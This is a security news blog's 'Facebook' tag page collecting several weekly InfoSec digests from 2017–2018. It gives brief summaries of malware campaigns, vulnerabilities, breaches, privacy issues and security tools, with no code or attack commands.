Tag Facebook

InfoSec Week 7, 2018

The Fidelis Cybersecurity researcher Jason Reaves demonstrated how covertly exchange data using X.509 digital certificates. The proof of concept code is using SubjectKeyIdentifier and generating certificates on the fly.

The "UDPoS" Point of Sale malware is using DNS traffic to exfiltrate stolen credit card data.

Talos analyzed malware threat targeting Olympic computer systems during the opening ceremony. The main purpose was information gathering and destroying the system.

Zero-day vulnerability in the Bitmessage messaging client was exploited to steal Electrum cryptocurrency wallet keys.

Trustwave analyzed multi-stage Microsoft Word attack which is NOT using macros. Really creative technique.

Microsoft can't fix Skype privilege escalation bug without the massive code rewrite, so they postponed it for a while.

Facebook is advertising their Onavo VPN application, but there are a few reasons why it is really not a good idea to use it.

Facebook is spamming users via SMS registered for two factor authentication (2FA). Then posts their responses on a wall.

(Not only) Performance analysis of a Retpoline mitigation for Spectre vulnerability.

A guide on how to brutefoce Linux Full Disk Encryption (LUKS) volumes using Hashcat software.

Proof of concept of LibreOffice remote arbitrary file disclosure vulnerability. It is possible to silently send any files. All operating systems affected before 5.4.5/6.0.1 versions.

InfoSec Week 49, 2017

The "Janus" Android vulnerability (CVE-2017-13156) allows attackers to modify the code in applications without affecting their signatures. The root of the problem is that a file can be a valid APK file and a valid DEX file at the same time. The vulnerability allows attackers to inject malware into legitimate application and avoiding detection.

According to the research by Hanno Böck, Juraj Somorovsky and Craig Young, the Bleichenbacher’s attack on RSA PKCS#1v1.5 encryption still works on almost 3% of the Alexa top million most visited websites. The researchers were even able to sign a message using Facebook’s private TLS key. Vendors like Citrix, F5, Cisco, and multiple SSL implementations are affected.

HP had a keylogger in the Touchpad driver, which was disabled by default, but could be enabled by setting a registry value.

There is a remote root code execution flaw (CVE-2017-15944) in the Palo Alto Networks firewalls.

Researchers from the Group-IB spotted the operations of a Russian-speaking MoneyTaker group that stole as much as $10 million from US and Russian banks.

Recorded Future analyzed costs of various cybercriminal services sold on the dark market.

Internet traffic for organizations such as Google, Apple, Facebook, Microsoft, Twitch were briefly rerouted to Russia.

Microsoft started rolling out an update for Malware Protection Engine to fix a remotely exploitable bug discovered by the British intelligence agency.

Avast open-sources RetDec machine-code decompiler for platform-independent analysis of executable files. It's based on LLVM.

Wireless network sniffer Kismet now supports the DJI DroneID UAV telemetry extensions.

Wazuh - Wazuh helps you to gain deeper security visibility into your infrastructure by monitoring hosts at an operating system and application level.
It supports log management and analysis, integrity monitoring, anomaly detection and compliance monitoring.

Wifiphisher is an automated victim-customized phishing attacks against Wi-Fi clients.

InfoSec Week 45, 2017

Researchers exploited antivirus software quarantine mechanism to gain privileges by manipulating the restore process from the virus quarantine. By abusing NTFS directory junctions, the AV quarantine restore process can be manipulated, so that previously quarantined files can be written to arbitrary file system locations.

Wikileaks released source code of leaked CIA hacking tools and it indicates that the CIA used fake certificates attributed to Kaspersky Labs for signing their malware.

A security researcher has discovered factory application in OnePlus devices. It can be used to gain root privileges, dump photos, collect WiFi & GPS information.

There was a vulnerability in CouchDB caused by a discrepancy between the database’s native JSON parser and the Javascript JSON parser used during document validation. Because CouchDB databases are meant to be exposed directly to the internet, this enabled privilege escalation, and ultimately remote code execution, on a large number of installations.

Researchers from the Princeton university have been studying third-party trackers that record sensitive personal data that users type into websites, and the results are not good.

iPhone X's Face ID facial recognition security mechanism system was circumvented by Vietnam experts using a 3D mask.

Security researcher Maxim Goryachy reports being able to execute unsigned code on computers running the Intel Management Engine through USB.

Deep dive into the Facebook sextorcism scheme using fake young girls profiles by the guys from Marseille.

Long read about how the security breaches by the Shadow Brokers damaged the US National Security Agency.

Analysis of a low cost Chinese GSM listening and location device hidden inside the plug of a standard USB data/charging cable.

Privacy Pass is a browser extension for Chrome and Firefox, which uses privacy-preserving cryptography to allow users to authenticate to the services without compromising their anonymity. It uses blind signature schemes.

InfoSec Week 33, 2017

Danish conglomerate Maersk expects to lose between $200-300m due to Petya ransomware infection, according to their latest quarterly results.

A Windows Object Linking Embedding (OLE) interface vulnerability in Microsoft PowerPoint in being exploited in order to install malware.

Interesting blog about the exploitation of a Foxit Reader.
"A tale about Foxit Reader - Safe Reading mode and other vulnerabilities"

Engineer decrypts Apple's Secure Enclave Processor (SEP) firmware.

Facebook awards $100,000 to 2017 Internet Defense Prize winning paper "Detecting Credential Spearphishing Attacks in Enterprise Settings". Very useful research for urgent topic.
https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/ho https://research.fb.com/facebook-awards-100000-to-2017-internet-defense-prize-winners/

Cryptographic library Libsodium has been audited by Matthew Green of Cryptography Engineering.

New research on integer factorization suggests that "build a massive decryption tool of IPsec traffic protected by the Oakley group~1 (a 768-bit discrete logarithm problem), was feasible in a reasonable time using technologies available before the year 2000." https://eprint.iacr.org/2017/758

EggShell is an iOS and macOS post exploitation surveillance pentest tool written in Python.

InfoSec Week 5, 2017

Egyptian human rights activists, dissidents, lawyers and journalists targeted by the phishing campaign. Links received by the email lead to a fake login page designed to trick the targets into giving away their Dropbox credentials.

Multiple Polish banks are victims of a malware infection through the Polish financial regulator KNF.

Hackers broke into the Czech Foreign Ministry email. "It must have been carried out from the outside, by another country. The way it was done bears a very strong resemblance to the attacks on the US Democratic Party's internet system," said the foreign minister, citing experts.

Extensive analysis of the Locky Bart ransomware binary and the backend server. Binary executable is obfuscated by the WPProtect code-virtualization. Server backend is written using Yii PHP framework.

APT group Turla using a new javascript payload called KopiLuwak when conducting their phishing attacks. The payload is stored in Office documents using embedded macro and uses multiple layers of the javascript obfuscation.

APT activity attributed to the Chinese actors is targeting military and aerospace industry in Russia and Belarus. The malware uses steganography to hide the payload.

Can Foreign Governments Launch Malware Attacks on Americans Without Consequences? There is an interesting ongoing court case - Kidane v. Ethiopia - where the Ethiopia's lawyer argued "that it should be able to do anything to Americans in America, even set off a car bomb, as long as Ethiopia didn’t have a human agent in the United States. One judge asked what would happen if Ethiopia mailed a letter bomb into the United States to assassinate an opponent, or hacked an American's self-driving car, causing it to crash. Ethiopia didn't hesitate: their counsel said that they could not be sued for any of those."

A hacker who has stolen 900 GB of data from the mobile forensics company Cellebrite, leaked online some known tools for the iOS exploitation and announced further releases. Released tools are publicly available frameworks. Hacker added that BlackBerry files in his possession are not publicly available.

Facebook engineers presented at the USENIX Enigma conference, a new mechanism for recovering access to lost online accounts, called Delegated Recovery. Delegated Recovery "allows an application to delegate the capability to recover an account to an account controlled by the same user or entity at a third party service provider".

Printer Exploitation Toolkit (PRET) is a new printer security testing framework.

InfoSec Week 4, 2017

LUNAR is a UNIX security auditing tool which generates a scored audit report of a Unix host's security.

Spora Ransomware has started to spread worldwide, outside Russian-speaking countries.

VirLocker ransomware is back, packing user files into executables. Every encrypted file is transformed into executable, so the malware can spread faster. Fortunately, the infected users can access their data without paying the ransom.

A malicious Microsoft Word document targeted NATO members in a campaign during the Christmas and New Year holiday.
"The purpose of the document is first to perform a reconnaissance of the victims in order to avoid communicating with sandbox systems or analyst virtual machines. Second, the Adobe Flash requests a payload and an Adobe Flash exploit which is loaded and executed on the fly. This approach is extremely clever, from the attacker point of view, the exploit is not embedded in the document making it more difficult to detect for some security devices than the standard word trojan."

Google announced the launch of a Root Certificate Authority - Google Trust Services - that will allow the company to independently handle certificates on behalf of Google and Alphabet.
https://security.googleblog.com/2017/01/the-foundation-of-more-secure-web.html https://pki.goog/

A hacker is accessing public and unsecured Apache Cassandra databases, creating extra table with a message that the database is unprotected.

Gmail will block .js file attachments starting February 13, 2017. The users who want to send .js files after this date can use Google Drive, Google Cloud Storage, or other storage solutions.

Facebook now supports physical security keys as a second form of identification.